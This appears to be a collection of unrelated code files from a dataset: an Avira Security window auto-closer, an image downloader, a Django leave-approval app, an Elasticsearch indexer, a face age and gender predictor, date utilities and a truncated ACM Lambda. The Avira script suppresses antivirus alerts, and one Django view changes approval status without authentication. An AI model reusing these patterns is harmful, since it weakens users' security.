+{"seq_id":"580736343","text":"import sys\nimport pywinauto\nfrom pywinauto import Desktop, Application\nimport time\nimport os\nimport pythoncom\nfrom threading import *\nimport time\nimport wmi\nimport keyboard\n\n\n\n\"\"\"Name\tPID\tStatus\tUser name\tCPU\tMemory (active private working set)\tArchitecture\tDescription\nAvira.Spotlight.UI.Application.exe\t13192\tRunning\tCarlos Moreno\t00 \t69,136 K\tx86\tAvira Security\n\"\"\"\ndef closeAvira():\n try:\n app = Application(backend=\"uia\").connect(path=\"Avira.Spotlight.UI.Application.exe\")\n print(\"connected to avira\")\n print(app.windows())\n \n if app.window(title = \"Avira Security\"):\n Desktop(backend=\"uia\").window(title=\"Avira Security\").close()\n print(\"Dispatched\")\n\n # dlg = app[\"Avira Security\"]\n # print(dlg.print_control_identifiers()) #btnWindowClose or btnOverLayClose\n # window = dlg.window(auto_id=\"AppWindow\")\n # window.click(auto_id=\"btnWindowClose\")\n except pywinauto.application.ProcessNotFoundError:\n print(\"Process not found\")\n\n\ndef listener():\n pythoncom.CoInitialize()\n print(pythoncom)\n c = wmi.WMI()\n print(c)\n process_watcher = c.Win32_Process.watch_for(\"creation\")\n while True:\n new_process = process_watcher()\n print(new_process)\n if new_process.Caption == \"Avira.Spotlight.UI.Application.exe\":\n print(\"send to close\")\n time.sleep(3)\n closeAvira()\n \n\ndef keyboardShortcut():\n while True:\n if keyboard.is_pressed(\"q\"):\n print(\"ending program\")\n sys.exit()\n \n\nif __name__ == '__main__': \n t = Thread(target=listener)\n keyboardWatcher = Thread(target=keyboardShortcut)\n # t.setDaemon(True)\n t.daemon = True\n keyboardWatcher.start()\n t.start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"170906955","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nimport pandas as pd\r\nimport urllib.request\r\nimport os \r\n#Define the name of the directory \r\nf_name = \"Zillow\"\r\n\r\n# Create the directory name where the images will be saved\r\nbase_dir = os.getcwd()\r\ndir_name = (f_name.split('/')[-1]).split('.')[0]\r\ndir_name\r\ndir_path = os.path.join(base_dir, dir_name)\r\n\r\n#Create the directory if not already there\r\nif not os.path.exists(dir_path):\r\n os.mkdir(dir_path)\r\n\r\n# Read the csv with links to all the image pages\r\nos.getcwd()\r\ndf = pd.read_csv(\"picture_links.csv\")\r\ndf.columns\r\nlinks=df.Picture_links\r\n\r\n# Function to take an image url and save the image in the given directory\r\ndef download_image(url,image_number):\r\n print(\"[INFO] downloading {}\".format(url))\r\n name = f\"Pic_{image_number}.jpg\" #File name that will be saved\r\n try:\r\n opener=urllib.request.build_opener()\r\n opener.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\r\n urllib.request.install_opener(opener)\r\n urllib.request.urlretrieve(url,os.path.join(dir_path, name))\r\n except Exception as error:\r\n print (\"[~] Error Occured with %s : %s\" % (name, error))\r\n \r\n \r\n# Print the number of images\r\nprint (\"[INFO] Downloading {} images\".format(len(links)))\r\n#Download ALL image in URL links list\r\nj=1 \r\nfor i in links[:465]:\r\n print (j)\r\n download_image(i,j)\r\n j+=1\r\n","sub_path":"Download_image.py","file_name":"Download_image.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"134228886","text":"from django.shortcuts import render,redirect\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import View, TemplateView, ListView, DetailView, CreateView, DeleteView\nfrom django.views.generic.edit import UpdateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom . import models\nfrom . import forms\nfrom django.utils import timezone\nfrom datetime import datetime\nfrom django.http import HttpResponseForbidden,Http404\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode,urlsafe_base64_decode\nfrom django.template.loader import render_to_string\nfrom employee.tokens import account_activation_token\n\nfrom django.utils.encoding import force_text\nfrom django.contrib.auth.tokens import default_token_generator\n\nfrom django.core.mail import EmailMessage\nfrom django.http import HttpResponse\nimport string\nfrom django.http import JsonResponse\nfrom django.db.models import Count\n\n# Create your views here.\nclass List(LoginRequiredMixin,ListView):\n model = models.LeaveRules\n template_name = 'leave/leave_rules_list.html'\n\nclass LeaveRulesDeleteView(DeleteView):\n model = models.LeaveRules\n success_url = reverse_lazy(\"leave:list\")\n\nclass LeaveRulesCreateView(LoginRequiredMixin,CreateView):\n form_class = forms.LeaveRulesForm\n template_name = 'leave/leave_rules_form.html'\n success_url = reverse_lazy(\"leave:list\")\n\nclass LeaveRulesDetail(LoginRequiredMixin,DetailView):\n model = models.LeaveRules\n template_name = 'leave/leave_rules_detail.html'\n\n def get_queryset(self):\n queryset = super().get_queryset()\n return queryset.filter(pk__iexact=self.kwargs.get('pk'))\n\nclass LeaveRulesUpdateView(LoginRequiredMixin,UpdateView):\n model = models.LeaveRules\n fields = ('leave_type','leave_rules')\n template_name = 'leave/leave_rules_form.html'\n # success_url = reverse_lazy(\"leave:detail\" pk=leaverules.pk)\n success_url = reverse_lazy(\"leave:list\")\n\nclass LeaveApplyCreateView(LoginRequiredMixin,CreateView):\n form_class = forms.LeaveApplyForm\n template_name = 'leave/leave_apply_form.html'\n success_url = reverse_lazy(\"leave:list\")\n\n def post(self, request, *args, **kwargs):\n registered = False\n\n if request.method == 'POST':\n leave_form = forms.LeaveApplyForm(data=request.POST)\n draft = request.POST.get('save', False)\n\n if leave_form.is_valid():\n leave = leave_form.save(commit=False)\n leave.user = request.user\n flag = 1\n if draft != 'Save':\n leave.published_date = timezone.now()\n leave.save()\n flag = leave_send_mails(request,leave.id)\n else:\n leave.save()\n registered = True\n if flag != 1:\n return redirect('leave:applied')\n else:\n return redirect('leave:draft', 
username=request.user.username)\n\n else:\n print(leave_form.errors)\n else:\n leave_form = self.form_class\n\n return render(request,self.template_name,\n {'form':leave_form,\n 'registered':registered})\n\nclass LeaveAppliedListView(LoginRequiredMixin,ListView):\n model = models.LeaveApply\n template_name = 'leave/leave_apply_status_list.html'\n\n def get_queryset(self):\n if self.request.user.is_superuser:\n return self.model.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n else:\n raise Http404()\n\nclass LeaveAppliedUserListView(LoginRequiredMixin,ListView):\n model = models.LeaveApply\n template_name = 'leave/leave_apply_list.html'\n\n def get_queryset(self):\n if self.kwargs.get('username') == self.request.user.username:\n return self.model.objects.filter(user__username__iexact=self.kwargs.get('username'),published_date__lte=timezone.now()).order_by('-published_date')\n else:\n raise Http404()\n\nclass LeaveDraftListView(LoginRequiredMixin,ListView):\n model = models.LeaveApply\n template_name = 'leave/leave_apply_list.html'\n\n def get_queryset(self):\n if self.kwargs.get('username') == self.request.user.username:\n return self.model.objects.filter(user__username__iexact=self.kwargs.get('username'),published_date__isnull=True).order_by('created_date')\n else:\n raise Http404()\n\nclass LeaveApplyUpdateView(LoginRequiredMixin,UpdateView):\n model = models.LeaveApply\n fields = ('leave_type','start_date','end_date','notes','tag_to')\n template_name = 'leave/leave_apply_form.html'\n # success_url = reverse_lazy(\"leave:detail\" pk=leaverules.pk)\n success_url = reverse_lazy(\"leave:applied\")\n\nclass LeaveApplyDeleteView(LoginRequiredMixin,DeleteView):\n model = models.LeaveApply\n success_url = reverse_lazy(\"leave:applied\")\n\ndef leave_send_mails(request,leave_id):\n model = models.LeaveApply\n start_date = datetime.strptime(request.POST['start_date'], '%d/%m/%Y').strftime('%Y-%m-%d')\n end_date = datetime.strptime(request.POST['end_date'], '%d/%m/%Y').strftime('%Y-%m-%d')\n user_leave_history = model.objects.filter(user__username__iexact=request.user.username,published_date__lte=timezone.now()).exclude(pk=leave_id). 
extra(select={\\\n 'month': \"EXTRACT(month FROM published_date)\",\n 'year': \"EXTRACT(year FROM published_date)\",\n }).\\\n values('month', 'year').\\\n annotate(count_items=Count('published_date')).order_by('-published_date')\n print (\"month,count,total\")\n total = 0\n for item in user_leave_history:\n total = total + item['count_items']\n if item['year'] < 2018: continue\n print (\"%02d-%s,%s,%s\" % (item['month'], item['year'], item['count_items'], total))\n others_leave_history = model.objects.filter(published_date__range=(start_date, end_date)).exclude(user__username__iexact=request.user.username).order_by('-published_date')\n superusers = models.User.objects.filter(is_superuser=True)\n recipient_list = request.POST['tag_to']\n for suser in superusers:\n if suser.email not in recipient_list:\n if request.user.email not in suser.email:\n recipient_list += suser.email\n\n recipient_list = list(set(recipient_list.split(\",\")))\n\n current_site = get_current_site(request)\n subject = 'Leave request'\n\n for rlist in recipient_list:\n if rlist.strip():\n message = render_to_string('leave/leave_request_email.html', {\n 'domain': current_site.domain,\n 'user': request.user,\n 'leave_details': request.POST,\n 'user_history': user_leave_history,\n 'other_history': others_leave_history,\n 'Approved': urlsafe_base64_encode(force_bytes('Approved')).decode(),\n 'Declined': urlsafe_base64_encode(force_bytes('Declined')).decode(),\n 'uidb64': urlsafe_base64_encode(force_bytes(request.user.pk)).decode(),\n 'lidb64': urlsafe_base64_encode(force_bytes(leave_id)).decode(),\n 'approve_by': urlsafe_base64_encode(force_bytes(rlist)).decode(),\n 'token': default_token_generator.make_token(request.user)\n })\n print(message)\n email = EmailMessage(subject, message, \"sathishkumar@appinessworld.com\", [rlist])\n email.content_subtype = \"html\"\n res = email.send()\n return HttpResponse('%s'%res)\n\ndef status(request,status,approve_by, uidb64, lidb64, token):\n try:\n uid = force_text(urlsafe_base64_decode(uidb64))\n user = models.User.objects.get(pk=uid)\n except (TypeError, ValueError, OverflowError, models.User.DoesNotExist):\n user = None\n try:\n lid = force_text(urlsafe_base64_decode(lidb64))\n leave = models.LeaveApply.objects.get(pk=lid)\n except (TypeError, ValueError, OverflowError, models.LeaveApply.DoesNotExist):\n leave = None\n if user and default_token_generator.check_token(user, token):\n status = force_text(urlsafe_base64_decode(status))\n approved_email = force_text(urlsafe_base64_decode(approve_by))\n status_by = models.User.objects.get(email=approved_email)\n\n leave.status = status\n leave.status_by = status_by.first_name\n leave.save()\n flag = leave_status_mails(request,user,leave,approved_email)\n validlink = {'validlink':True}\n return render(request, 'leave/leave_status.html',context=validlink)\n else:\n return render(request, 'leave/leave_status.html',{'validlink': False})\n\ndef leave_status_mails(request,user,leave,approved_email):\n superusers = models.User.objects.filter(is_superuser=True)\n recipient_list = leave.tag_to\n for suser in superusers:\n if suser.email not in recipient_list:\n if user.email not in suser.email:\n recipient_list += suser.email\n\n recipient_list += user.email\n\n recipient_list = list(set(recipient_list.split(\",\")))\n\n current_site = get_current_site(request)\n subject = 'Leave status'\n\n for rlist in recipient_list:\n if rlist.strip():\n if rlist not in approved_email:\n message = render_to_string('leave/leave_status_email.html', {\n 
'domain': current_site.domain,\n 'user': user,\n 'leave_details': leave,\n })\n print(message)\n email = EmailMessage(subject, message, \"sathishkumar@appinessworld.com\", [rlist])\n email.content_subtype = \"html\"\n res = email.send()\n return HttpResponse('%s'%res)\n\ndef leave_status(request):\n approved_email = request.GET.get('approved_email')\n data = request.GET.get('data').split(\",\")\n try:\n user_id = data[2]\n user = models.User.objects.get(pk=user_id)\n except (TypeError, ValueError, OverflowError, models.User.DoesNotExist):\n user = None\n try:\n leave_id = data[1]\n leave = models.LeaveApply.objects.get(pk=leave_id)\n except (TypeError, ValueError, OverflowError, models.LeaveApply.DoesNotExist):\n leave = None\n\n if user and leave:\n status = data[0]\n status_by = models.User.objects.get(email=approved_email)\n\n leave.status = status\n leave.status_by = status_by.first_name\n leave.save()\n flag = leave_status_mails(request,user,leave,approved_email)\n updated = True\n else:\n updated = False\n data = {\n 'is_taken': updated\n }\n return JsonResponse(data)\n
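# --- Editor's note: a hedged alternative to the .extra(select=...) monthly aggregation used in leave_send_mails above. .extra() is discouraged in modern Django; TruncMonth (Django >= 1.10) expresses the same grouping. Sketch only, not part of the original file. ---\n# from django.db.models.functions import TruncMonth\n# monthly = (models.LeaveApply.objects\n#            .filter(user__username__iexact=request.user.username,\n#                    published_date__lte=timezone.now())\n#            .annotate(month=TruncMonth('published_date'))\n#            .values('month')\n#            .annotate(count_items=Count('id'))\n#            .order_by('month'))\n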
default_logger.info(\"索引{}已经存在了\".format(indexname))\n if overwrite:\n # 如果是覆盖,那么就删除原来的\n es.indices.delete(index=indexname)\n default_logger.info(\"删除索引:{}\".format(indexname))\n ret = es.indices.create(index=indexname, body=index_config)\n default_logger.info(\"创建索引,返回结果:{}\".format(ret))\n else:\n ret = es.indices.create(index=indexname, body=index_config)\n default_logger.info(\"创建索引,返回结果:{}\".format(ret))\n start = timeit.default_timer()\n write_doc_parallel(es, indexname, data)\n end = timeit.default_timer()\n default_logger.info(\"完成索引的创建,共耗时:{}\".format(end - start))\n es.indices.put_settings(index=indexname, body=index_config_after)\n\n\ndef get_es_client():\n \"\"\"获取ES Client\n \"\"\"\n return Elasticsearch(timeout=60, max_retries=10, retry_on_timeout=True)\n\n\ndef write_doc_parallel(es, indexname, data_dir):\n \"\"\"并发创建索引\n \"\"\"\n start = timeit.default_timer()\n actions_iter = get_actions_iterator(indexname, data_dir)\n # ret = parallel_bulk(es, actions_iter, thread_count=process_count,\n # chunk_size=bulk_count, queue_size=process_count*2)\n ret = streaming_bulk(es, actions_iter, chunk_size=bulk_count,\n max_retries=10, request_timeout=10000)\n count = 0\n for ok, info in ret:\n count += 1\n if count > 0 and count % report_count == 0:\n end = timeit.default_timer()\n default_logger.info(\"完成{}行,耗时{}\".format(count, end - start))\n if not ok:\n default_logger.info(\"出现错误:{}\".format(info))\n end = timeit.default_timer()\n default_logger.info(\"完成{}行,耗时{}\".format(count, end - start))\n\n\ndef get_actions_iterator(indexname, data_dir):\n \"\"\"获取actions的迭代器\n \"\"\"\n count = 0\n files = get_files(data_dir)\n\n start = timeit.default_timer()\n for file in files:\n with open(file, mode='r', encoding='utf8') as f:\n for line in f:\n fields = line.split('\\t')\n if len(fields) == 3:\n count += 1\n action = _build_action(indexname=indexname,\n subject=fields[0].strip(),\n predicate=fields[1].strip(),\n object=fields[2].strip())\n yield action\n\n\ndef _build_action(indexname, subject, predicate, object):\n \"\"\"创建一个bulk使用的action\n \"\"\"\n action = {\n '_index': indexname,\n '_op_type': 'index', # 这个操作表示索引文档\n '_source': {\n 'subject': subject,\n 'predicate': predicate,\n 'object': object\n }\n }\n\n return action\n","sub_path":"entitylinking/index_elasticsearch/triple_index_creator_new.py","file_name":"triple_index_creator_new.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"647218638","text":"#Usar\r\n#python Keras_10_Age_and_Gender_Prediction_VGG-Face_Sefik_Serengil_03_video.py\r\n\r\n#Documentation: https://sefiks.com/2019/02/13/apparent-age-and-gender-prediction-in-keras/\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom keras.models import Model, Sequential\r\nfrom keras.layers import Input, Convolution2D, ZeroPadding2D, MaxPooling2D, Flatten, Dense, Dropout, Activation\r\nfrom PIL import Image\r\nfrom keras.preprocessing.image import load_img, save_img, img_to_array\r\nfrom keras.applications.imagenet_utils import preprocess_input\r\nfrom keras.preprocessing import image\r\nfrom keras.models import model_from_json\r\nimport matplotlib.pyplot as plt\r\n\r\n### Keras 2.3.0 e TensorFlow 2.0\r\nimport tensorflow as tf\r\nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\r\nprint(\"physical_devices-------------\", len(physical_devices))\r\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\r\n### Keras 2.3.0 e TensorFlow 
2.0\r\n\r\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')\r\n\r\ndef preprocess_image(image_path):\r\n img = load_img(image_path, target_size=(224, 224))\r\n img = img_to_array(img)\r\n img = np.expand_dims(img, axis=0)\r\n img = preprocess_input(img)\r\n return img\r\n\r\ndef loadVggFaceModel():\r\n model = Sequential()\r\n model.add(ZeroPadding2D((1,1),input_shape=(224,224, 3)))\r\n model.add(Convolution2D(64, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(64, (3, 3), activation='relu'))\r\n model.add(MaxPooling2D((2,2), strides=(2,2)))\r\n\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(128, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(128, (3, 3), activation='relu'))\r\n model.add(MaxPooling2D((2,2), strides=(2,2)))\r\n\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(256, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(256, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(256, (3, 3), activation='relu'))\r\n model.add(MaxPooling2D((2,2), strides=(2,2)))\r\n\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(MaxPooling2D((2,2), strides=(2,2)))\r\n\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(MaxPooling2D((2,2), strides=(2,2)))\r\n\r\n model.add(Convolution2D(4096, (7, 7), activation='relu'))\r\n model.add(Dropout(0.5))\r\n model.add(Convolution2D(4096, (1, 1), activation='relu'))\r\n model.add(Dropout(0.5))\r\n model.add(Convolution2D(2622, (1, 1)))\r\n model.add(Flatten())\r\n model.add(Activation('softmax'))\r\n \r\n return model\r\n\r\ndef ageModel():\r\n model = loadVggFaceModel()\r\n \r\n base_model_output = Sequential()\r\n base_model_output = Convolution2D(101, (1, 1), name='predictions')(model.layers[-4].output)\r\n base_model_output = Flatten()(base_model_output)\r\n base_model_output = Activation('softmax')(base_model_output)\r\n \r\n age_model = Model(inputs=model.input, outputs=base_model_output)\r\n \r\n #you can find the pre-trained weights for age prediction here: https://drive.google.com/file/d/1YCox_4kJ-BYeXq27uUbasu--yz28zUMV/view?usp=sharing\r\n age_model.load_weights(\"age_model_weights.h5\")\r\n \r\n return age_model\r\n\r\ndef genderModel():\r\n model = loadVggFaceModel()\r\n \r\n base_model_output = Sequential()\r\n base_model_output = Convolution2D(2, (1, 1), name='predictions')(model.layers[-4].output)\r\n base_model_output = Flatten()(base_model_output)\r\n base_model_output = Activation('softmax')(base_model_output)\r\n\r\n gender_model = Model(inputs=model.input, outputs=base_model_output)\r\n \r\n #you can find the pre-trained weights for gender prediction here: https://drive.google.com/file/d/1wUXRVlbsni2FN9-jkS_f4UTUrm1bRLyk/view?usp=sharing\r\n gender_model.load_weights(\"gender_model_weights.h5\")\r\n \r\n return gender_model\r\n \r\nage_model = ageModel()\r\ngender_model = genderModel()\r\n\r\n#age model has 101 
outputs and its outputs will be multiplied by its index label. sum will be apparent age\r\noutput_indexes = np.array([i for i in range(0, 101)])\r\n\r\n#------------------------\r\n\r\ncap = cv2.VideoCapture('Gigante_no_Mic_Apendice.mp4')\r\n#cap = cv2.VideoCapture(0)\r\nstop = 0\r\nret=True\r\n\r\nwhile (ret==True):\r\n\tif (stop==0):\r\n\t\tret, img = cap.read()\r\n\t\tif (ret == True):\r\n\t\t\timg = cv2.resize(img,None,fx=0.5,fy=0.5)\r\n\t\t\tfaces = face_cascade.detectMultiScale(img, 1.13, 5)\r\n\t\t\tfor (x,y,w,h) in faces:\r\n\t\t\t\tif w > 130: #ignore small faces\r\n\t\t\t\t\tdetected_face = img[int(y):int(y+h), int(x):int(x+w)] #crop detected face\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\t#age gender data set has 40% margin around the face. expand detected face.\r\n\t\t\t\t\t\tmargin = 30\r\n\t\t\t\t\t\tmargin_x = int((w * margin)/100)\r\n\t\t\t\t\t\tmargin_y = int((h * margin)/100)\r\n\t\t\t\t\t\tdetected_face = img[int(y-margin_y):int(y+h+margin_y), int(x-margin_x):int(x+w+margin_x)]\r\n\t\t\t\t\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint(\"detected face has no margin\")\r\n\t\t\t\t\t\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\t#vgg-face expects inputs (224, 224, 3)\r\n\t\t\t\t\t\tdetected_face = cv2.resize(detected_face, (224, 224))\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\timg_pixels = image.img_to_array(detected_face)\r\n\t\t\t\t\t\timg_pixels = np.expand_dims(img_pixels, axis = 0)\r\n\t\t\t\t\t\timg_pixels /= 255\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t#find out age and gender\r\n\t\t\t\t\t\tage_distributions = age_model.predict(img_pixels)\r\n\t\t\t\t\t\tapparent_age = str(int(np.floor(np.sum(age_distributions * output_indexes, axis = 1))[0]))\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tgender_distribution = gender_model.predict(img_pixels)[0]\r\n\t\t\t\t\t\tgender_index = np.argmax(gender_distribution)\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tif gender_index == 0: gender = \"Female\"\r\n\t\t\t\t\t\telse: gender = \"Male\"\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tcv2.rectangle(img,(x,y),(x+w,y+h),(255,255,255),5)\r\n\t\t\t\t\t\t#labels for age and gender\r\n\t\t\t\t\t\tcv2.putText(img, apparent_age, (x, y), cv2.FONT_HERSHEY_SIMPLEX, 1.3, (0,255,0), 10)\r\n\t\t\t\t\t\tcv2.putText(img, apparent_age, (x, y), cv2.FONT_HERSHEY_SIMPLEX, 1.3, (0,0,0), 3)\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tcv2.putText(img, str(gender), (x, y+w), cv2.FONT_HERSHEY_SIMPLEX, 1.3, (0,255,0), 10)\r\n\t\t\t\t\t\tcv2.putText(img, str(gender), (x, y+w), cv2.FONT_HERSHEY_SIMPLEX, 1.3, (0,0,0), 3)\r\n\t\t\t\t\t\tcv2.imshow(\"Detected face\", detected_face)\t\t \r\n\t\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\tprint(\"exception\",str(e))\r\n\t\t\t\t\t\r\n\t\t\t\t\tcv2.imshow(\"Output\", img)\r\n\tkey = cv2.waitKey(1) & 0xFF\r\n\tif key == ord('s'):\r\n\t\tstop = not(stop)\r\n\tif key == ord('q'):\r\n\t\tbreak\r\ncv2.destroyAllWindows()\r\n","sub_path":"10_Age_and_Gender_Prediction_VGG-Face_Sefik_Serengil/Keras_10_Age_and_Gender_Prediction_VGG-Face_Sefik_Serengil_03_video.py","file_name":"Keras_10_Age_and_Gender_Prediction_VGG-Face_Sefik_Serengil_03_video.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"368755135","text":"from datetime import timedelta\nimport datetime\nimport time\n\nfrom django.utils import timezone\nfrom pytz import tzinfo\nimport pytz\n\nfrom cr_review_sys.errors import DateTimeFormatInvalid\n\n\nclass DateHelper(object):\n\n @staticmethod\n def calculate_mtk_week(time):\n '''\n Get MTK week for now,\n Return type is int or None\n '''\n try:\n if time:\n temp_result 
= time.isocalendar()\n now_year = temp_result[0]\n final_week = temp_result[1]\n return (now_year, final_week + 1) if temp_result[2] == 7 else (now_year, final_week)\n else:\n return (None, None)\n except Exception:\n return (None, None)\n\n @staticmethod\n def get_days_from_specific_date(submit_date):\n '''\n Calculate the day interval between now and a particular date, e.g. submit date/resolved date, etc.\n Return type is int\n (the if check guards against missing dates synced from WITS(CQ))\n '''\n return (datetime.datetime.now().date() - submit_date.date()).days if submit_date else 0\n\n @staticmethod\n def is_will_kickoff_prj_in_one_mon(start_date):\n '''\n Compare the start date with now to check whether this project is about to kick off\n Returns boolean; True if the project will kick off within one month (31 days)\n '''\n day_interval = (start_date.date() -\n datetime.datetime.now().date()).days\n return True if 0 < day_interval < 32 else False\n\n @staticmethod\n def get_year_datetime_for_query(from_year, to_year):\n '''\n Convert years to datetimes for a query condition,\n Ex. From year: 2014, To year: 2017,\n return result will be\n from_datetime = datetime.datetime(2014, 1, 1, 00, 00, 00)\n to_datetime = datetime.datetime(2017, 12, 31, 23, 59, 59)\n Return (from_datetime, to_datetime)\n '''\n from_datetime = None\n to_datetime = None\n\n if not(from_year and to_year) or from_year > to_year:\n return (from_datetime, to_datetime)\n int_from_year = int(from_year)\n int_to_year = int(to_year)\n\n from_datetime = datetime.datetime(int_from_year, 1, 1)\n to_datetime = datetime.datetime(int_to_year, 12, 31, 23, 59, 59)\n\n return (from_datetime, to_datetime)\n\n @staticmethod\n def get_new_sync_job_id(db):\n new_sync_job_id = db + time.strftime(\"%Y%m%d%H%M%S\")\n return new_sync_job_id\n\n @staticmethod\n def get_local_time(time):\n local_time = None\n if time:\n local_time = timezone.template_localtime(time)\n return local_time\n return time\n\n @staticmethod\n def get_current_time_str():\n cur_time_str = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n return cur_time_str\n\n @staticmethod\n def get_gmt_for_input_time(input_time, tz=None):\n '''\n convert a str to a datetime with timezone\n str format: %Y-%m-%d %H:%M:%S\n default is GMT-8; pass tz to override\n '''\n result = None\n tz = tz if tz else \"Etc/GMT-8\"\n tzinfo = pytz.timezone(tz)\n\n try:\n result = datetime.datetime.strptime(\n input_time, \"%Y-%m-%d %H:%M:%S\").replace(tzinfo=tzinfo)\n except Exception:\n raise DateTimeFormatInvalid()\n\n return result\n\n @staticmethod\n def get_localtime_from_db(db_time, tz=None, str_format=None):\n '''\n convert a DB datetime to a str\n str_format overrides the format; default is \"%Y-%m-%d %H:%M:%S\"\n '''\n result = None\n str_format = str_format if str_format else \"%Y-%m-%d %H:%M:%S\"\n local_time_delta = timedelta(hours=8)\n new_time = db_time + local_time_delta\n\n try:\n result = new_time.strftime(str_format)\n except Exception:\n raise Exception()\n\n return result\n\n @staticmethod\n def get_today(str_format=None):\n result = None\n str_format = str_format if str_format else \"%Y%m%d\"\n\n try:\n result = datetime.datetime.now().strftime(str_format)\n except Exception:\n raise DateTimeFormatInvalid()\n\n return result\n\n @staticmethod\n def datetime_to_str(ori_time, str_format=None):\n str_format = str_format if str_format else \"%Y-%m-%d %H:%M:%S\"\n return ori_time.strftime(str_format)\n\n @staticmethod\n def datetime_set_tz(ori_time, tz=None):\n result = None\n tz = tz if tz else \"Etc/GMT\"\n tzinfo = pytz.timezone(tz)\n\n if ori_time:\n result = ori_time.replace(tzinfo=tzinfo)\n return result\n
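# --- Editor's usage sketch (illustrative values, not from the original module) ---\n# DateHelper.get_year_datetime_for_query(2014, 2017)\n#   -> (datetime.datetime(2014, 1, 1, 0, 0), datetime.datetime(2017, 12, 31, 23, 59, 59))\n# DateHelper.get_gmt_for_input_time('2019-01-01 12:00:00')\n#   -> the parsed datetime tagged with the Etc/GMT-8 timezone\n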
else \"Etc/GMT\"\n tzinfo = pytz.timezone(tz)\n\n if ori_time:\n result = ori_time.replace(tzinfo=tzinfo)\n return result\n","sub_path":"my_to_do/util/date_helper.py","file_name":"date_helper.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"79782451","text":"g=input()\ng=g.split()\nz1=int(g[0])\nz2=int(g[1])\nq=input()\nq=q.split()\nd=0\nl1=[]\nl2=[]\nfor i in g:\n l1.append(int(i))\nfor j in q:\n l2.append(j)\nif(z2<=z1):\n for i in range(0,z2):\n d=d+int(l2[i])\nprint(d)\n \n","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"623368510","text":"\"\"\"\nLambda function backing cloudformation certificate resource\n\nPost-minification, this module must be less than 4KiB.\n\n\"\"\"\n\nimport copy\nimport hashlib\nimport json\nimport logging\nimport time\n\nfrom boto3 import client\nfrom botocore.exceptions import ClientError, ParamValidationError\nfrom urllib.request import Request, urlopen\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nlog_info = logger.info\nlog_exception = logger.exception\nshallow_copy = copy.copy\nsleep = time.sleep\n\njson_dumps = lambda j: json.dumps(j, sort_keys=True).encode()\n\nREINVOKED = 'R'\n\ndef handler(e, c): # handler(event, context, /)\n \"\"\"\n Cloudformation custom resource handler\n\n :param e: lambda event payload\n :param c: lambda execution context\n\n \"\"\"\n\n get_remaining_time_in_millis = c.get_remaining_time_in_millis\n\n log_info(e)\n\n def request_cert():\n \"\"\"\n Create a certificate\n\n This create an ACM certificate and update the event payload with the PhysicalResourceId.\n The certificate will not yet be issued.\n\n \"\"\"\n\n api_request = shallow_copy(props)\n\n for key in ['ServiceToken', 'Region', 'Tags', 'Route53RoleArn']:\n api_request.pop(key, None)\n\n if 'ValidationMethod' in props:\n if props['ValidationMethod'] == 'DNS':\n\n # Check that we have all the hosted zone information we need to validate\n # before we create the certificate\n for name in set([props['DomainName']] + props.get('SubjectAlternativeNames', [])):\n get_zone_for(name)\n\n del api_request['DomainValidationOptions']\n\n e['PhysicalResourceId'] = acm.request_certificate(\n IdempotencyToken=i_token,\n **api_request\n 